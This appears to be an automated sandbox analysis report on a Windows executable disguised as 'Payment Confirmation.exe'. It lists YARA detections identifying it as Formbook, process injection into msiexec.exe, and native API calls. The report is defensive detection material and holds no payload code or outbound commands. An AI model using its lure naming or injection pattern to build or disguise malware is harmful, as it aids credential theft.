Source: Yara match File source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Payment Confirmation.exe
Executable has a suspicious name (potential lure to open the executable)
Source: Payment Confirmation.exe Static file information: Suspicious name
Uses 32bit PE files
Source: Payment Confirmation.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 1_2_004030FB
Detected potential crypto function
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004047D3 1_2_004047D3
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_004061D4 1_2_004061D4
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10008856 1_2_10008856
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10003D10 1_2_10003D10
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10011101 1_2_10011101
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000F922 1_2_1000F922
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100119CC 1_2_100119CC
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100059D1 1_2_100059D1
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001AA08 1_2_1001AA08
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1001AA17 1_2_1001AA17
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000B25E 1_2_1000B25E
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000FE94 1_2_1000FE94
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10005EC5 1_2_10005EC5
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_100062DD 1_2_100062DD
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10006712 1_2_10006712
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_10006B47 1_2_10006B47
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 1_2_1000F3B0 1_2_1000F3B0
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00401030 4_2_00401030
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041B8B3 4_2_0041B8B3
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041D1E9 4_2_0041D1E9
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041C983 4_2_0041C983
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041D247 4_2_0041D247
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041D352 4_2_0041D352
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041CB6E 4_2_0041CB6E
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041CBE6 4_2_0041CBE6
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041C3B0 4_2_0041C3B0
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00408C4B 4_2_00408C4B
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00408C90 4_2_00408C90
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_0041CCB8 4_2_0041CCB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044F841F 11_2_044F841F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045A1002 11_2_045A1002
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FB090 11_2_044FB090
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045B1D55 11_2_045B1D55
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044EF900 11_2_044EF900
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044E0D20 11_2_044E0D20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04504120 11_2_04504120
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_044FD5E0 11_2_044FD5E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04506E30 11_2_04506E30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0451EBB0 11_2_0451EBB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046D1E9 11_2_0046D1E9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046C983 11_2_0046C983
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046D247 11_2_0046D247
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046D352 11_2_0046D352
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046CB6E 11_2_0046CB6E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046CBE6 11_2_0046CBE6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00458C4B 11_2_00458C4B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00458C90 11_2_00458C90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046CCB8 11_2_0046CCB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00452D89 11_2_00452D89
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00452D90 11_2_00452D90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00452FB0 11_2_00452FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 044EB150 appears 32 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_004185D0 NtCreateFile, 4_2_004185D0
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00418680 NtReadFile, 4_2_00418680
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_00418700 NtClose, 4_2_00418700
Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 4_2_004187B0 NtAllocateVirtualMemory, 4_2_004187B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529840 NtDelayExecution,LdrInitializeThunk, 11_2_04529840
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529860 NtQuerySystemInformation,LdrInitializeThunk, 11_2_04529860
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529540 NtReadFile,LdrInitializeThunk, 11_2_04529540
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk, 11_2_04529910
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045295D0 NtClose,LdrInitializeThunk, 11_2_045295D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045299A0 NtCreateSection,LdrInitializeThunk, 11_2_045299A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A50 NtCreateFile,LdrInitializeThunk, 11_2_04529A50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045296D0 NtCreateKey,LdrInitializeThunk, 11_2_045296D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_045296E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529710 NtQueryInformationToken,LdrInitializeThunk, 11_2_04529710
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529FE0 NtCreateMutant,LdrInitializeThunk, 11_2_04529FE0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529780 NtMapViewOfSection,LdrInitializeThunk, 11_2_04529780
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452B040 NtSuspendThread, 11_2_0452B040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529820 NtEnumerateKey, 11_2_04529820
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045298F0 NtReadVirtualMemory, 11_2_045298F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045298A0 NtWriteVirtualMemory, 11_2_045298A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529950 NtQueueApcThread, 11_2_04529950
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529560 NtWriteFile, 11_2_04529560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452AD30 NtSetContextThread, 11_2_0452AD30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529520 NtWaitForSingleObject, 11_2_04529520
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045299D0 NtCreateProcessEx, 11_2_045299D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045295F0 NtQueryInformationFile, 11_2_045295F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529650 NtQueryValueKey, 11_2_04529650
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529670 NtQueryInformationProcess, 11_2_04529670
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529660 NtAllocateVirtualMemory, 11_2_04529660
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529610 NtEnumerateValueKey, 11_2_04529610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A10 NtQuerySection, 11_2_04529A10
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A00 NtProtectVirtualMemory, 11_2_04529A00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A20 NtResumeThread, 11_2_04529A20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529A80 NtOpenDirectoryObject, 11_2_04529A80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529770 NtSetInformationFile, 11_2_04529770
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452A770 NtOpenThread, 11_2_0452A770
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529760 NtOpenProcess, 11_2_04529760
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452A710 NtOpenProcessToken, 11_2_0452A710
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529B00 NtSetValueKey, 11_2_04529B00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_04529730 NtQueryVirtualMemory, 11_2_04529730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0452A3B0 NtGetContextThread, 11_2_0452A3B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_045297A0 NtUnmapViewOfSection, 11_2_045297A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004685D0 NtCreateFile, 11_2_004685D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00468680 NtReadFile, 11_2_00468680
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00468700 NtClose, 11_2_00468700
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004685CA NtCreateFile, 11_2_004685CA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0046867A NtReadFile, 11_2_0046867A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00468623 NtReadFile, 11_2_00468623
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004686FA NtClose, 11_2_004686FA
Sample file is different than original file name gathered from version info
Source: Payment Confirmation.exe, 00000001.00000003.361229670.000000000F196000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
Source: Payment Confirmation.exe, 00000004.00000002.438024069.0000000000C0F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
Source: Payment Confirmation.exe, 00000004.00000002.438309815.0000000000E6F000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamemsiexec.exeX vs Payment Confirmation.exe
PE file contains strange resources
Source: Payment Confirmation.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: Payment Confirmation.exe Virustotal: Detection: 24%
Source: Payment Confirmation.exe ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\Payment Confirmation.exe File read: C:\Users\user\Desktop\Payment Confirmation.exe Jump to behavior
Source: Payment Confirmation.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Payment Confirmation.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
